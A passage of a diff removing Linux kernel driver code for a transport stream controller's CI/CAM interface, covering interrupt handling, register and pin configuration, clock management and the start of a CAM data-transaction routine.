--	wake_up_interruptible(&tsc_ci->poll_queue);
--
--	/* If in the middle of a data transaction- aborting the transaction */
--	if (tsc_ci->data_busy && tsc_device->hw_card_status ==
--			TSC_CARD_STATUS_NOT_DETECTED) {
--		spin_lock_irqsave(&tsc_ci->spinlock, flags);
--		tsc_ci->transaction_state = TRANSACTION_CARD_REMOVED;
--		spin_unlock_irqrestore(&tsc_ci->spinlock, flags);
--		complete_all(&tsc_ci->transaction_complete);
--	}
--
--	if (tsc_device->hw_card_status == TSC_CARD_STATUS_DETECTED &&
--			!tsc_device->card_power) {
--		ret = tsc_card_power_up();
--		if (ret != 0)
--			pr_err("%s: card power-up failed\n", __func__);
--		else
--			tsc_device->card_power = true;
--	} else if (tsc_device->hw_card_status == TSC_CARD_STATUS_NOT_DETECTED &&
--			tsc_device->card_power) {
--		tsc_card_power_down();
--		/*
--		 * In case something failed during the power down, the sequence
--		 * continue and the status of the card power is considered as
--		 * powered down.
--		 */
--		tsc_device->card_power = false;
--	}
--
--	mutex_unlock(&tsc_ci->mutex);
--
--	return IRQ_HANDLED;
--}
--
--/**
-- * tsc_cam_cmd_irq_handler() - TSC CAM interrupt handler.
-- *
-- * @irq:	Interrupt number.
-- * @dev:	TSC device.
-- *
-- * Handle TSC CAM HW interrupt. Handle the CAM transaction interrupts by waking
-- * up the completion sync object, handle rate mismatch interrupt by waking-up
-- * the TSC Mux poll wait-queue and clear the interrupts received.
-- *
-- * Return IRQ_HANDLED.
-- */
--static irqreturn_t tsc_cam_cmd_irq_handler(int irq, void *dev)
--{
--	struct tsc_ci_chdev *tsc_ci;
--	struct tsc_mux_chdev *tsc_mux;
--	unsigned long flags;
--	u32 stat_reg, ena_reg;
--
--	tsc_ci = &tsc_device->ci_chdev;
--	tsc_mux = &tsc_device->mux_chdev;
--
--	stat_reg = readl_relaxed(tsc_device->base + TSC_STAT);
--
--	/* Handling transaction interrupts */
--	if (TEST_BIT(CAM_IRQ_ERR_OFFS, stat_reg) ||
--			TEST_BIT(CAM_IRQ_EOT_OFFS, stat_reg)) {
--		spin_lock_irqsave(&tsc_ci->spinlock, flags);
--
--		if (TEST_BIT(CAM_IRQ_EOT_OFFS, stat_reg))
--			tsc_ci->transaction_state = TRANSACTION_SUCCESS;
--		else
--			tsc_ci->transaction_state = TRANSACTION_ERROR;
--
--		spin_unlock_irqrestore(&tsc_ci->spinlock, flags);
--		complete_all(&tsc_ci->transaction_complete);
--	}
--
--	/* Handling rate mismatch interrupt */
--	if (TEST_BIT(CAM_IRQ_RATE_MISMATCH_OFFS, stat_reg)) {
--		spin_lock_irqsave(&tsc_mux->spinlock, flags);
--
--		/* Disabling rate mismatch interrupt */
--		ena_reg = readl_relaxed(tsc_device->base + TSC_IRQ_ENA);
--		CLEAR_BIT(CAM_IRQ_RATE_MISMATCH_OFFS, ena_reg);
--		writel_relaxed(ena_reg, tsc_device->base + TSC_IRQ_ENA);
--
--		/* Setting internal flag for poll */
--		tsc_mux->rate_interrupt = true;
--
--		spin_unlock_irqrestore(&tsc_mux->spinlock, flags);
--		/* waking-up mux poll queue */
--		wake_up_interruptible(&tsc_mux->poll_queue);
--	}
--
--	/* Clearing all the interrupts received */
--	writel_relaxed(stat_reg, tsc_device->base + TSC_IRQ_CLR);
--
--	/*
--	 * Before returning IRQ_HANDLED to the generic interrupt handling
--	 * framework need to make sure all operations including clearing of
--	 * interrupt status registers in the hardware is performed.
--	 * Thus a barrier after clearing the interrupt status register
--	 * is required to guarantee that the interrupt status register has
--	 * really been cleared by the time we return from this handler.
--	 */
--	wmb();
--
--	return IRQ_HANDLED;
--}
--
--/************************** Internal functions **************************/
--
--/**
-- * tsc_set_cicam_clk() - Setting the rate of the TS from the TSC to the CAM
-- *
-- * @arg:	The argument received from the user-space via set rate IOCTL.
-- *		It is the value of the requested rate in MHz.
-- *
-- * Setting the rate of the cicam_ts_clk clock, with one of the valid clock
-- * frequencies. The arg value given is rounded to the nearest frequency.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_set_cicam_clk(unsigned long arg)
--{
--	int ret;
--
--	if (arg <= 8)
--		ret = clk_set_rate(tsc_device->cicam_ts_clk,
--				CICAM_CLK_RATE_7MHZ);
--	else if (arg <= 11)
--		ret = clk_set_rate(tsc_device->cicam_ts_clk,
--				CICAM_CLK_RATE_9MHZ);
--	else
--		ret = clk_set_rate(tsc_device->cicam_ts_clk,
--				CICAM_CLK_RATE_12MHZ);
--	return ret;
--}
--
--/**
-- * tsc_enable_rate_irq() - Enabling the rate mismatch interrupt.
-- *
-- * @tsc_mux:		TSC Mux device.
-- *
-- * Setting the bit of this interrupt in the register that controls which
-- * interrupts are enabled.
-- */
--static void tsc_enable_rate_irq(struct tsc_mux_chdev *tsc_mux)
--{
--	unsigned long flags;
--	u32 ena_reg = 0;
--
--	spin_lock_irqsave(&tsc_mux->spinlock, flags);
--
--	/* Setting the bit to start receiving rate mismatch interrupt again */
--	ena_reg = readl_relaxed(tsc_device->base + TSC_IRQ_ENA);
--	SET_BIT(CAM_IRQ_RATE_MISMATCH_OFFS, ena_reg);
--	writel_relaxed(ena_reg, tsc_device->base + TSC_IRQ_ENA);
--
--	spin_unlock_irqrestore(&tsc_mux->spinlock, flags);
--}
--
--/**
-- * tsc_config_tsif() - Modifying TSIF configuration.
-- *
-- * @tsc_mux:		TSC Mux device.
-- * @tsif_params:	TSIF parameters received from the user-space via IOCTL.
-- *
-- * Update the specified TSIF parameters according to the values in tsif_params.
-- * The update is done by modifying a HW register.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_config_tsif(struct tsc_mux_chdev *tsc_mux,
--		struct tsc_tsif_params *tsif_params)
--{
--	int ret = 0;
--	u32 reg;
--	int reg_internal_offs;
--	u32 reg_addr_offs;
--
--	switch (tsif_params->source) {
--	case TSC_SOURCE_EXTERNAL0:
--		reg_internal_offs = 0;
--		reg_addr_offs = TSC_IN_IFC_EXT;
--		break;
--	case TSC_SOURCE_EXTERNAL1:
--		reg_internal_offs = 16;
--		reg_addr_offs = TSC_IN_IFC_EXT;
--		break;
--	case TSC_SOURCE_INTERNAL:
--		reg_internal_offs = 0;
--		reg_addr_offs = TSC_IN_IFC_CFG_INT;
--		break;
--	case TSC_SOURCE_CICAM:
--		reg_internal_offs = 16;
--		reg_addr_offs = TSC_IN_IFC_CFG_INT;
--		break;
--	default:
--		pr_err("%s: unidentified source parameter\n", __func__);
--		ret = -EINVAL;
--		goto err;
--	}
--
--
--	reg = readl_relaxed(tsc_device->base + reg_addr_offs);
--
--	/* Modifying TSIF settings in the register value */
--	(tsif_params->clock_polarity ?
--		SET_BIT((reg_internal_offs + TSIF_CLK_POL_OFFS), reg) :
--		CLEAR_BIT((reg_internal_offs + TSIF_CLK_POL_OFFS), reg));
--	(tsif_params->data_polarity ?
--		SET_BIT(((reg_internal_offs + TSIF_DATA_POL_OFFS)), reg) :
--		CLEAR_BIT((reg_internal_offs + TSIF_DATA_POL_OFFS), reg));
--	(tsif_params->start_polarity ?
--		SET_BIT((reg_internal_offs + TSIF_START_POL_OFFS), reg) :
--		CLEAR_BIT((reg_internal_offs + TSIF_START_POL_OFFS), reg));
--	(tsif_params->valid_polarity ?
--		SET_BIT((reg_internal_offs + TSIF_VALID_POL_OFFS), reg) :
--		CLEAR_BIT((reg_internal_offs + TSIF_VALID_POL_OFFS), reg));
--	(tsif_params->error_polarity ?
--		SET_BIT((reg_internal_offs + TSIF_ERROR_POL_OFFS), reg) :
--		CLEAR_BIT((reg_internal_offs + TSIF_ERROR_POL_OFFS), reg));
--	(tsif_params->data_type ?
--		SET_BIT((reg_internal_offs + TSIF_SER_PAR_OFFS), reg) :
--		CLEAR_BIT((reg_internal_offs + TSIF_SER_PAR_OFFS), reg));
--	reg &= ~(0x3 << TSIF_REC_MODE_OFFS);
--	reg |= (tsif_params->receive_mode << TSIF_REC_MODE_OFFS);
--	(tsif_params->data_swap ?
--		SET_BIT((reg_internal_offs + TSIF_DATA_SWAP_OFFS), reg) :
--		CLEAR_BIT((reg_internal_offs + TSIF_DATA_SWAP_OFFS), reg));
--	(tsif_params->set_error ?
--		SET_BIT((reg_internal_offs + TSIF_ERR_INSERT_OFFS), reg) :
--		CLEAR_BIT((reg_internal_offs + TSIF_ERR_INSERT_OFFS), reg));
--
--	/* Writing the new settings to the register */
--	writel_relaxed(reg, tsc_device->base + reg_addr_offs);
--
--err:
--	return ret;
--}
--
--/**
-- * tsc_suspend_ts_pins() - Suspend TS-in pins
-- *
-- * @source:     The TSIF to configure.
-- *
-- * Config the TLMM pins of a TSIF as TS-in pins in sleep state according to
-- * the current pinctrl configuration of the other pins.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_suspend_ts_pins(enum tsc_source source)
--{
--	int ret = 0;
--	struct pinctrl_info *ppinctrl = &tsc_device->pinctrl_info;
--	struct pinctrl_current_state *pcurr_state = &ppinctrl->curr_state;
--
--	if (mutex_lock_interruptible(&tsc_device->mutex))
--		return -ERESTARTSYS;
--
--	if (source == TSC_SOURCE_EXTERNAL0) {
--		if (!ppinctrl->is_ts0) {
--			pr_err("%s: No TS0-in pinctrl definitions were found in the TSC devicetree\n",
--					__func__);
--			mutex_unlock(&tsc_device->mutex);
--			return -EPERM;
--		}
--
--		/* Transition from current pinctrl state to curr + ts0 sleep */
--		switch (pcurr_state->pcmcia_state) {
--		case PCMCIA_STATE_DISABLE:
--			if (pcurr_state->ts1)
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--						ppinctrl->ts1);
--			else
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--						ppinctrl->disable);
--			break;
--		case PCMCIA_STATE_PC_CARD:
--			if (pcurr_state->ts1)
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ts1_pc_card);
--			else
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->pc_card);
--			break;
--		case PCMCIA_STATE_CI_CARD:
--			if (pcurr_state->ts1)
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ts1_ci_card);
--			else
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ci_card);
--			break;
--		case PCMCIA_STATE_CI_PLUS:
--			if (pcurr_state->ts1)
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ts1_ci_plus);
--			else
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ci_plus);
--			break;
--		}
--	} else  { /* source == TSC_SOURCE_EXTERNAL1 */
--		if (!ppinctrl->is_ts1) {
--			pr_err("%s: No TS1-in pinctrl definitions were found in the TSC devicetree\n",
--					__func__);
--			mutex_unlock(&tsc_device->mutex);
--			return -EPERM;
--		}
--
--		/* Transition from current pinctrl state to curr + ts1 sleep */
--		switch (pcurr_state->pcmcia_state) {
--		case PCMCIA_STATE_DISABLE:
--			if (pcurr_state->ts0)
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ts0);
--			else
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->disable);
--			break;
--		case PCMCIA_STATE_PC_CARD:
--			if (pcurr_state->ts0)
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ts0_pc_card);
--			else
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->pc_card);
--			break;
--		case PCMCIA_STATE_CI_CARD:
--			if (pcurr_state->ts0)
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ts0_ci_card);
--			else
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ci_card);
--			break;
--		case PCMCIA_STATE_CI_PLUS:
--			if (pcurr_state->ts0)
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ts0_ci_plus);
--			else
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ci_plus);
--			break;
--		}
--	}
--
--	if (ret != 0) {
--		pr_err("%s: error disabling TS-in pins. ret value = %d\n",
--			__func__, ret);
--		mutex_unlock(&tsc_device->mutex);
--		return -EINVAL;
--	}
--
--	/* Update the current pinctrl state in the internal struct */
--	if (source == TSC_SOURCE_EXTERNAL0)
--		pcurr_state->ts0 = false;
--	else
--		pcurr_state->ts1 = false;
--
--	mutex_unlock(&tsc_device->mutex);
--
--	return 0;
--}
--
--/**
-- * tsc_activate_ts_pins() - Activate TS-in pins
-- *
-- * @source:	The TSIF to configure.
-- *
-- * Config the TLMM pins of a TSIF as TS-in pins in active state according to
-- * the current pinctrl configuration of the other pins
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_activate_ts_pins(enum tsc_source source)
--{
--	int ret = 0;
--	struct pinctrl_info *ppinctrl = &tsc_device->pinctrl_info;
--	struct pinctrl_current_state *pcurr_state = &ppinctrl->curr_state;
--
--	if (mutex_lock_interruptible(&tsc_device->mutex))
--		return -ERESTARTSYS;
--
--	if (source == TSC_SOURCE_EXTERNAL0) {
--		if (!ppinctrl->is_ts0) {
--			pr_err("%s: No TS0-in pinctrl definitions were found in the TSC devicetree\n",
--					__func__);
--			mutex_unlock(&tsc_device->mutex);
--			return -EPERM;
--		}
--
--		/* Transition from current pinctrl state to curr + ts0 active */
--		switch (pcurr_state->pcmcia_state) {
--		case PCMCIA_STATE_DISABLE:
--			if (pcurr_state->ts1)
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--						ppinctrl->dual_ts);
--			else
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--						ppinctrl->ts0);
--			break;
--		case PCMCIA_STATE_PC_CARD:
--			if (pcurr_state->ts1)
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->dual_ts_pc_card);
--			else
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ts0_pc_card);
--			break;
--		case PCMCIA_STATE_CI_CARD:
--			if (pcurr_state->ts1)
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->dual_ts_ci_card);
--			else
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ts0_ci_card);
--			break;
--		case PCMCIA_STATE_CI_PLUS:
--			if (pcurr_state->ts1)
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->dual_ts_ci_plus);
--			else
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ts0_ci_plus);
--			break;
--		}
--	} else  { /* source == TSC_SOURCE_EXTERNAL1 */
--		if (!ppinctrl->is_ts1) {
--			pr_err("%s: No TS1-in pinctrl definitions were found in the TSC devicetree\n",
--					__func__);
--			mutex_unlock(&tsc_device->mutex);
--			return -EPERM;
--		}
--
--		/* Transition from current pinctrl state to curr + ts1 active */
--		switch (pcurr_state->pcmcia_state) {
--		case PCMCIA_STATE_DISABLE:
--			if (pcurr_state->ts0)
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->dual_ts);
--			else
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ts1);
--			break;
--		case PCMCIA_STATE_PC_CARD:
--			if (pcurr_state->ts0)
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->dual_ts_pc_card);
--			else
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ts1_pc_card);
--			break;
--		case PCMCIA_STATE_CI_CARD:
--			if (pcurr_state->ts0)
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->dual_ts_ci_card);
--			else
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ts1_ci_card);
--			break;
--		case PCMCIA_STATE_CI_PLUS:
--			if (pcurr_state->ts0)
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->dual_ts_ci_plus);
--			else
--				ret = pinctrl_select_state(ppinctrl->pinctrl,
--					ppinctrl->ts1_ci_plus);
--			break;
--		}
--	}
--
--	if (ret != 0) {
--		pr_err("%s: error activating TS-in pins. ret value = %d\n",
--			__func__, ret);
--		mutex_unlock(&tsc_device->mutex);
--		return -EINVAL;
--	}
--
--	/* Update the current pinctrl state in the internal struct */
--	if (source == TSC_SOURCE_EXTERNAL0)
--		pcurr_state->ts0 = true;
--	else
--		pcurr_state->ts1 = true;
--
--	mutex_unlock(&tsc_device->mutex);
--
--	return 0;
--}
--
--/**
-- * tsc_enable_disable_tsif() - Enable/disable a TSIF.
-- *
-- * @tsc_mux:	TSC Mux device.
-- * @source:	The TSIF to enable or disable.
-- * @operation:	The operation to perform: 0- enable, 1- disable.
-- *
-- * Enable or disable the specified TSIF, which consequently will block the TS
-- * flowing through this TSIF. The update is done by modifying a HW register.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_enable_disable_tsif(struct tsc_mux_chdev *tsc_mux,
--		enum tsc_source source, int operation)
--{
--	int ret = 0;
--	u32 reg;
--	u32 addr_offs;
--	int reg_offs;
--	int curr_disable_state;
--
--	switch (source) {
--	case TSC_SOURCE_EXTERNAL0:
--		reg_offs = 0;
--		addr_offs = TSC_IN_IFC_EXT;
--		break;
--	case TSC_SOURCE_EXTERNAL1:
--		reg_offs = 16;
--		addr_offs = TSC_IN_IFC_EXT;
--		break;
--	case TSC_SOURCE_INTERNAL:
--		reg_offs = 0;
--		addr_offs = TSC_IN_IFC_CFG_INT;
--		break;
--	case TSC_SOURCE_CICAM:
--		reg_offs = 16;
--		addr_offs = TSC_IN_IFC_CFG_INT;
--		break;
--	default:
--		pr_err("%s: unidentified source parameter\n", __func__);
--		ret = -EINVAL;
--		return ret;
--	}
--
--	/* Reading the current enable/disable state from the register */
--	reg = readl_relaxed(tsc_device->base + addr_offs);
--	curr_disable_state = GETL_BITS(reg, TSIF_DISABLE_OFFS + reg_offs,
--			TSIF_DISABLE_OFFS + reg_offs);
--	/* If the current state equals the new state- return success */
--	if (curr_disable_state == operation)
--		return ret;
--
--	if (operation == TSIF_INPUT_DISABLE) {
--		if (source == TSC_SOURCE_EXTERNAL0 ||
--				source == TSC_SOURCE_EXTERNAL1) {
--			/* Disabling the TS-in pins in the TLMM */
--			ret = tsc_suspend_ts_pins(source);
--			if (ret != 0) {
--				pr_err("%s: Error suspending TS-in pins",
--						__func__);
--				return ret;
--			}
--		}
--		SET_BIT((reg_offs + TSIF_DISABLE_OFFS), reg);
--	} else {
--		if (source == TSC_SOURCE_EXTERNAL0 ||
--				source == TSC_SOURCE_EXTERNAL1) {
--			/* Enabling the TS-in pins in the TLMM */
--			ret = tsc_activate_ts_pins(source);
--			if (ret != 0) {
--				pr_err("%s: Error activating TS-in pins",
--						__func__);
--				return ret;
--			}
--		}
--		CLEAR_BIT((reg_offs + TSIF_DISABLE_OFFS), reg);
--	}
--
--	/* Writing back to the reg the enable/disable of the TSIF */
--	writel_relaxed(reg, tsc_device->base + addr_offs);
--
--	return ret;
--}
--
--/**
-- * tsc_route_mux() - Configuring one of the TSC muxes.
-- *
-- * @tsc_mux:	TSC Mux device.
-- * @source:	The requested TS source to be selected by the mux.
-- * @dest:	The requested mux.
-- *
-- * Configuring the specified mux to pass the TS indicated by the src parameter.
-- * The update is done by modifying a HW register.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_route_mux(struct tsc_mux_chdev *tsc_mux, enum tsc_source source,
--		enum tsc_dest dest)
--{
--	int ret = 0;
--	u32 mux_cfg_reg;
--	int src_val;
--
--	switch (source) {
--	case TSC_SOURCE_EXTERNAL0:
--		src_val = MUX_EXTERNAL_DEMOD_0;
--		break;
--	case TSC_SOURCE_EXTERNAL1:
--		src_val = MUX_EXTERNAL_DEMOD_1;
--		break;
--	case TSC_SOURCE_INTERNAL:
--		src_val = MUX_INTERNAL_DEMOD;
--		break;
--	case TSC_SOURCE_CICAM:
--		src_val = MUX_CICAM;
--		break;
--	default:
--		pr_err("%s: unidentified source parameter\n", __func__);
--		ret = -EINVAL;
--		goto err;
--	}
--
--	/* Reading the current muxes state, to change only the requested mux */
--	mux_cfg_reg = readl_relaxed(tsc_device->base + TSC_MUX_CFG);
--
--	switch (dest) {
--	case TSC_DEST_TSPP0:
--		mux_cfg_reg &= ~(0x3 << MUX0_OFFS);
--		mux_cfg_reg |= (src_val << MUX0_OFFS);
--		break;
--	case TSC_DEST_TSPP1:
--		mux_cfg_reg &= ~(0x3 << MUX1_OFFS);
--		mux_cfg_reg |= (src_val << MUX1_OFFS);
--		break;
--	case TSC_DEST_CICAM:
--		if (src_val == TSC_SOURCE_CICAM) {
--			pr_err("%s: Error: CICAM cannot be source and dest\n",
--					__func__);
--			ret = -EINVAL;
--			goto err;
--		}
--		mux_cfg_reg &= ~(0x3 << MUX_CAM_OFFS);
--		mux_cfg_reg |= (src_val << MUX_CAM_OFFS);
--		break;
--	default:
--		pr_err("%s: unidentified dest parameter\n", __func__);
--		ret = -EINVAL;
--		goto err;
--	}
--
--	writel_relaxed(mux_cfg_reg, tsc_device->base + TSC_MUX_CFG);
--
--err:
--	return ret;
--}
--
--/**
-- * is_tsc_idle() - Checking if TSC is idle.
-- *
-- * @tsc_ci:		TSC CI device.
-- *
-- * Reading the TSC state-machine register and checking if the TSC is busy in
-- * one of the operations reflected by this register.
-- *
-- * Return true if the TSC is idle and false if it's busy.
-- */
--static bool is_tsc_idle(struct tsc_ci_chdev *tsc_ci)
--{
--	u32 fsm_reg;
--
--	fsm_reg = readl_relaxed(tsc_device->base + TSC_FSM_STATE);
--	if (GETL_BITS(fsm_reg, FSM_STATE_BUFFER_BEG, FSM_STATE_BUFFER_END) ||
--		GETL_BITS(fsm_reg, FSM_STATE_POLL_BEG, FSM_STATE_POLL_END) ||
--		GETL_BITS(fsm_reg, FSM_STATE_BYTE_BEG, FSM_STATE_BYTE_END) ||
--		GETL_BITS(fsm_reg, FSM_STATE_MEM_WR_BEG,
--				FSM_STATE_MEM_WR_END) ||
--		GETL_BITS(fsm_reg, FSM_STATE_MEM_RD_BEG,
--				FSM_STATE_MEM_RD_END) ||
--		GETL_BITS(fsm_reg, FSM_STATE_IO_RD_BEG, FSM_STATE_IO_RD_END) ||
--		GETL_BITS(fsm_reg, FSM_STATE_IO_WR_BEG, FSM_STATE_IO_WR_END) ||
--			tsc_ci->data_busy)
--		return false;
--
--	tsc_ci->data_busy = true;
--
--	return true;
--}
--
--
--/**
-- * tsc_power_on_buff_mode_clocks() - power-on the TSPP2 and VBIF clocks.
-- *
-- * Power-on the TSPP2 and the VBIF clocks required for buffer mode transaction.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_power_on_buff_mode_clocks(void)
--{
--	int ret = 0;
--
--	ret = clk_prepare_enable(tsc_device->tspp2_core_clk);
--	if (ret != 0) {
--		pr_err("%s: Can't start tspp2_core_clk", __func__);
--		goto err_tspp2;
--	}
--	ret = clk_prepare_enable(tsc_device->vbif_tspp2_clk);
--	if (ret != 0) {
--		pr_err("%s: Can't start vbif_tspp2_clk", __func__);
--		goto err_vbif_tspp2;
--	}
--	ret = clk_prepare_enable(tsc_device->vbif_ahb_clk);
--	if (ret != 0) {
--		pr_err("%s: Can't start vbif_ahb_clk", __func__);
--		goto err_vbif_ahb;
--	}
--	ret = clk_prepare_enable(tsc_device->vbif_axi_clk);
--	if (ret != 0) {
--		pr_err("%s: Can't start vbif_axi_clk", __func__);
--		goto err_vbif_axi;
--	}
--
--	return ret;
--
--err_vbif_axi:
--	clk_disable_unprepare(tsc_device->vbif_ahb_clk);
--err_vbif_ahb:
--	clk_disable_unprepare(tsc_device->vbif_tspp2_clk);
--err_vbif_tspp2:
--	clk_disable_unprepare(tsc_device->tspp2_core_clk);
--err_tspp2:
--	return ret;
--}
--
--/**
-- * tsc_power_off_buff_mode_clocks() - power-off the SPP2 and VBIF clocks.
-- *
-- * Power-off the TSPP2 and the VBIF clocks required for buffer mode transaction.
-- */
--static void tsc_power_off_buff_mode_clocks(void)
--{
--	clk_disable_unprepare(tsc_device->vbif_axi_clk);
--	clk_disable_unprepare(tsc_device->vbif_ahb_clk);
--	clk_disable_unprepare(tsc_device->tspp2_core_clk);
--	clk_disable_unprepare(tsc_device->vbif_tspp2_clk);
--}
--
--/**
-- * tsc_config_cam_data_transaction() - Configuring a new data transaction.
-- *
-- * @addr_size:	The value for the address_size register field- address when
-- *		using single byte-mode, and size when using buffer mode.
-- * @wr_data:	the value for the wr_data register field- data to write to the
-- *		cam when using single byte mode.
-- * @io_mem:	The value for the io_mem register field- 1 for IO transaction,
-- *		0 for memory transaction.
-- * @read_write:	The value for the read_write register field- 1 for read
-- *		transaction, 0 for write transaction.
-- * @buff_mode:	The value for the buff_mode register field- 1 for buffer mode,
-- *		0 for single byte mode.
-- *
-- * Configuring the cam cmd register with the specified parameters, to initiate
-- * data transaction with the cam.
-- */
--static void tsc_config_cam_data_transaction(u16 addr_size,
--		u8 wr_data,
--		uint io_mem,
--		uint read_write,
--		uint buff_mode)
--{
--	u32 cam_cmd_reg = 0;
--
--	cam_cmd_reg |= (addr_size << CAM_CMD_ADDR_SIZE_OFFS);
--	cam_cmd_reg |= (wr_data << CAM_CMD_WR_DATA_OFFS);
--	cam_cmd_reg |= (io_mem << CAM_CMD_IO_MEM_OFFS);
--	cam_cmd_reg |= (read_write << CAM_CMD_RD_WR_OFFS);
--	cam_cmd_reg |= (buff_mode << CAM_CMD_BUFF_MODE_OFFS);
--	writel_relaxed(cam_cmd_reg, tsc_device->base + TSC_CAM_CMD);
--}
--
--/**
-- * tsc_data_transaction() - Blocking function that manage the data transactions.
-- *
-- * @tsc_ci:	TSC CI device.
-- * @io_mem:	The value for the io_mem register field- 1 for IO transaction,
-- *		0 for memory transaction.
-- * @read_write:	The value for the read_write register field- 1 for read
-- *		transaction, 0 for write transaction.
-- * @buff_mode:	The value for the buff_mode register field- 1 for buffer mode,
-- *		0 for single byte mode.
-- * @arg:	The argument received from the user-space via a data transaction
-- *		IOCTL. It is from one of the two following types:
-- *		"struct tsc_single_byte_mode" and "struct tsc_buffer_mode".
-- *
-- * Receiving the transaction paramters from the user-space. Configure the HW
-- * registers to initiate a data transaction with the cam. Wait for an
-- * interrupt indicating the transaction is over and return the the data read
-- * from the cam in case of single-byte read transaction.
-- *
-- * Return 0 on success, error value otherwise.
-- */
--static int tsc_data_transaction(struct tsc_ci_chdev *tsc_ci, uint io_mem,
--		uint read_write, uint buff_mode, unsigned long arg)
--{
--	struct tsc_single_byte_mode arg_byte;
--	struct tsc_buffer_mode arg_buff;
--	u16 addr_size;
--	u8 wr_data;
--	uint timeout;
--	u32 cam_cmd_reg;
--	struct ion_handle *ion_handle = NULL;
--	ion_phys_addr_t iova = 0;
--	unsigned long buffer_size = 0;
--	unsigned long flags = 0;
--	int ret = 0;
--
--	if (!arg)
--		return -EINVAL;
--
--	/* make sure the tsc is in idle state before configuring the cam */
--	if (!is_tsc_idle(tsc_ci)) {
--		ret =  -EBUSY;
--		goto finish;
--	}
--
--	INIT_COMPLETION(tsc_ci->transaction_finish);
--
--	/* copying data from the ioctl parameter */
--	if (buff_mode == SINGLE_BYTE_MODE) {
--		if (copy_from_user(&arg_byte, (void *)arg,
--				sizeof(struct tsc_single_byte_mode))) {
--			ret = -EFAULT;
--			goto err_copy_arg;
--		}
--		addr_size = arg_byte.address;
--		if (IO_TRANSACTION == io_mem &&
--				addr_size > CICAM_MAX_ADDRESS) {
--			pr_err("%s: wrong address parameter: %d\n", __func__,
--					addr_size);
--			ret = -EFAULT;
--			goto err_copy_arg;
--		}
--		wr_data = arg_byte.data;
--		timeout = arg_byte.timeout;
--	} else {
--		if (copy_from_user(&arg_buff, (void *)arg,
--				sizeof(struct tsc_buffer_mode))) {
--			ret =  -EFAULT;
--			goto err_copy_arg;
--		}
--		addr_size = arg_buff.buffer_size;
--		if (!addr_size) {
--			pr_err("%s: size parameter is 0\n", __func__);
--			ret =  -EFAULT;
--			goto err_copy_arg;
--		}
--		wr_data = 0;
--		timeout = arg_buff.timeout;
--
--		/* import ion handle from the ion fd passed from user-space */
--		ion_handle = ion_import_dma_buf
--			(tsc_device->iommu_info.ion_client, arg_buff.buffer_fd);
--		if (IS_ERR_OR_NULL(ion_handle)) {
--			pr_err("%s: get_ION_handle failed\n", __func__);
--			ret =  -EIO;
--			goto err_ion_handle;
--		}
--
--		/*
--		 * mapping the ion handle to the VBIF and get the virtual
--		 * address
--		 */
--		ret = ion_map_iommu(tsc_device->iommu_info.ion_client,
--				ion_handle, tsc_device->iommu_info.domain_num,
--				tsc_device->iommu_info.partition_num, SZ_4K,
--				0, &iova, &buffer_size, 0, 0);
--
--		if (ret != 0) {
--			pr_err("%s: get_ION_kernel physical addr fail\n",
--					__func__);
--			goto err_ion_map;
--		}
--
--		/*
--		 * writing the buffer virtual address to the register for buffer
--		 * address of buffer mode
--		 */
--		if (read_write == READ_TRANSACTION)
--			writel_relaxed(iova,
--					tsc_device->base + TSC_RD_BUFF_ADDR);
--		else   /* write transaction */
--			writel_relaxed(iova,
--					tsc_device->base + TSC_WR_BUFF_ADDR);
--	}
--
--	/* configuring the cam command register */
--	tsc_config_cam_data_transaction(addr_size, wr_data, io_mem, read_write,
--			buff_mode);
--
--	/*
--	 * This function assume the mutex is locked before calling the function,
--	 * so mutex has to be unlocked before going to sleep when waiting for
--	 * the transaction.
--	 */
--	mutex_unlock(&tsc_ci->mutex);
--	/* waiting for EOT interrupt or timeout */
--	if (!wait_for_completion_timeout(&tsc_ci->transaction_complete,
--			msecs_to_jiffies(timeout))) {
--		pr_err("%s: Error: wait for transaction timed-out\n", __func__);
--		ret =  -ETIMEDOUT;
--		mutex_lock(&tsc_ci->mutex);
--		/* Aborting the transaction if it's buffer mode */
--		if (buff_mode) {
